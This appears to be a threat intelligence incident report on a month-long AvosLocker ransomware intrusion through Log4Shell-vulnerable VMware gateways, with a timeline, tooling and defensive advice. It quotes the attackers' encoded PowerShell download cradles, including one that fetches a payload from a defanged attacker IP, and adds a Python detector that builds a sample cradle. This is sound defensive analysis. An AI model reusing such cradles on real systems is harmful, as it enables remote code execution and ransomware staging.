During a recent client engagement we observed a month-long AvosLocker campaign. The attackers' toolset included Cobalt Strike, Sliver, and several commercial network scanners.
Two VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell served as the initial entry point for this incident. Although Cisco products were deployed on the network, they were never installed on the appliances, which gave the attacker access to internal machines and a base of operations.
The security products raised several alerts while the attacker was active on the network, but the security team never investigated them; doing so could have stopped the ransomware activity.
Threat Actor Profile: Avos
Avos is a ransomware group first observed in 2021 that initially targeted Windows systems. AvosLocker, the ransomware named after the group, has more recently begun to target Linux systems as well. Active since June 2021, Avos follows the ransomware-as-a-service (RaaS) model and uses an affiliate program to attract partners; the group is well-funded and financially motivated. The program's advertisement informs affiliates of the ransomware's features and explains how the AvosLocker operators handle negotiations and extortion. A user named "Avos" has also been seen recruiting on the Russian-language forum XSS.
Typically, Avos uses spam email campaigns as the initial infection vector. In this incident, however, the initial vector was an ESXi server exposed to the internet through VMWare Horizon Unified Access Gateways (UAG) that were vulnerable to Log4Shell. The customer alerted Talos on March 7, 2022, but activity connected to the ransomware attack had been detected as early as February 7, 2022.
Several vulnerabilities associated with Log4j, listed below, were found on this customer’s UAG:
These vulnerabilities can be exploited to execute remote code on the Unified Access Gateways in the context of a low-privileged, non-root user named "gateway". The attackers used this as their initial access to build a foothold on the customer's network, which in turn gave them access to internal servers. In addition, the internal transit firewalls that could have governed or restricted access to the internal infrastructure were not configured.
Talos was able to gather crucial data about the whole attack lifecycle because the victim used Cisco Secure Endpoint (formerly Advanced Malware Protection) as its EPP/EDR solution on most endpoints, from workstations to servers.
In the early stages of the attack the threat actor took a number of actions to establish a foothold on the victim network. Additional payloads and malicious tools were seen on endpoints, as was the use of living-off-the-land binaries (LoLBins).
At 01:41 UTC on February 11, Talos observed the attackers using the WMI Provider Host (wmiprvse.exe) on the Windows Server that served as the initial point of entry to execute an encoded PowerShell script that used the DownloadString method.
On Feb. 14, three days later, a retrospective detection was triggered for the executable RuntimeBrokerService.exe in "C:\Windows\System32\temp" creating a file named "watcher.exe". These files appear to be tied to a bitcoin miner rather than AvosLocker, so they may be remnants of a different threat actor. A miner is frequently deployed alongside ransomware as a passive source of income. In addition, the discovery of DarkComet samples unrelated to this campaign is strong evidence that multiple threat actors had compromised this network. Roughly four weeks later, on March 4, another encoded PowerShell command was executed, shown below, again using the DownloadString method.
powershell.exe -exec bypass -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHKACWB0AGUAbQAuAEAZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKAKQAUAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAAA6ACAALwA0ADUALgAxADMANgAuADIAMwAwACAWAADEAOgA0ADAAMAAwACAAyADMANABSADIAMWAnACkAOwA=
iex (New-Object System.Net.WebClient).DownloadString('http://45[.]136[.]230[.]191:4000/D234R23');
On March 6, two days later, the attacker used further PowerShell scripts to download and run a Sliver payload named "vmware kb.exe". Team Cymru has seen this executable deployed in a similar campaign, as noted in their blog post about Sliver. In the days that followed, a number of PowerShell scripts downloaded additional files, including Mimikatz and an "IIS Temporary Compressed Files.zip" archive containing Cobalt Strike beacons and a port scanner named "scanner.exe". This is SoftPerfect Network Scanner, a commercially available port scanner that Avos is well known for deploying. Later the same day, the attackers used WMIC to change administrative settings on both a local and a remote system, an early sign of lateral movement.
Another PowerShell command seen on March 6 is an artefact from a Cobalt Strike beacon executing its powershell-import function, as shown below:
powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAAAuAFcAZQBiAGMAbAbABpAGUAbgB0ACkALgBEAG8A dwBuAGwAbwAgAUQAUWB0AHIAAQBuAGcAKAAAGgAdAB0AAAOgAvAC8AMQAyADcALgAwAC4AMAAAAAAAAGAzADIANAA2AdcALwAnACkA
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:32467/')
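Both encoded commands above (the March 4 cradle and the Cobalt Strike powershell-import artefact) share the same shape: a base64-encoded UTF-16LE script passed via -enc/-EncodedCommand that feeds DownloadString into IEX. The following detection helper is an added example, not code from Talos or the original post; it decodes such command lines from process telemetry, flags the IEX/DownloadString pattern, and extracts staging URLs. The sample command line it embeds is constructed (203.0.113.10 is a documentation address), and the helper tolerates the truncated or corrupted base64 that often appears in pasted telemetry instead of crashing on it.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand, so each of these
# switches is followed by a base64 (UTF-16LE) payload in the next argument.
ENC_FLAGS = ("-e", "-ec", "-en", "-enc", "-enco", "-encod", "-encodedcommand")
# A download cradle: Invoke-Expression (or its alias iex) fed by DownloadString.
CRADLE_RE = re.compile(r"(?:iex|invoke-expression)\b.*downloadstring", re.I | re.S)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

@dataclass
class Finding:
    decoded: str
    urls: List[str] = field(default_factory=list)
    download_cradle: bool = False

def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script when cmdline carries an encoded-command switch, else None."""
    parts = cmdline.split()
    for i, tok in enumerate(parts[:-1]):
        if tok.lower() in ENC_FLAGS:
            try:
                return base64.b64decode(parts[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                # Truncated or corrupted argument (common in pasted telemetry):
                # report nothing rather than crash, so the caller can flag it separately.
                return None
    return None

def analyze(cmdline: str) -> Optional[Finding]:
    """Decode the command line and flag DownloadString cradles plus any staging URLs."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None
    return Finding(decoded=decoded, urls=URL_RE.findall(decoded),
                   download_cradle=bool(CRADLE_RE.search(decoded)))

# Constructed sample modelled on the March 4 cradle; 203.0.113.10 is a documentation address.
SAMPLE_SCRIPT = "iex (New-Object System.Net.WebClient).DownloadString('http://203.0.113.10:4000/stage');"
SAMPLE_CMDLINE = "powershell.exe -exec bypass -enc " + encode_powershell(SAMPLE_SCRIPT)
```

Run it over EDR process-creation events (Secure Endpoint, Sysmon event ID 1, Windows 4688 with command-line auditing) and alert on findings where download_cradle is true; the extracted URLs give you the staging host to block and hunt for.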
On March 8, another instance of SoftPerfect Network Scanner was transferred to a different server in the network using AnyDesk. Later that day the AvosLocker payload was finally delivered, with the victim's company name as the filename.
The attackers used PDQ Deploy, a legitimate software distribution tool, to push the ransomware and other tools across the target network. Once the ransomware was deployed, the victims' files were encrypted and a ransom note was displayed, as shown below.
This incident underscores the need to correctly set up and configure security appliances, apply updates and patches, and have a security team that continuously monitors alerts. Although the attack techniques used in this campaign are not new, they can still be effective when the right security measures are not in place.
With a highly motivated threat actor like Avos actively recruiting affiliates, these attacks are likely to become more frequent. Such attackers are continuously looking for insecure networks that they can easily access, sometimes alongside several other threat actors, as in this case. Detecting, containing, and protecting against post-exploitation activity requires a layered defence: endpoint security and properly configured analysis of system activity are both crucial, and they should be used together with static and network-based detection.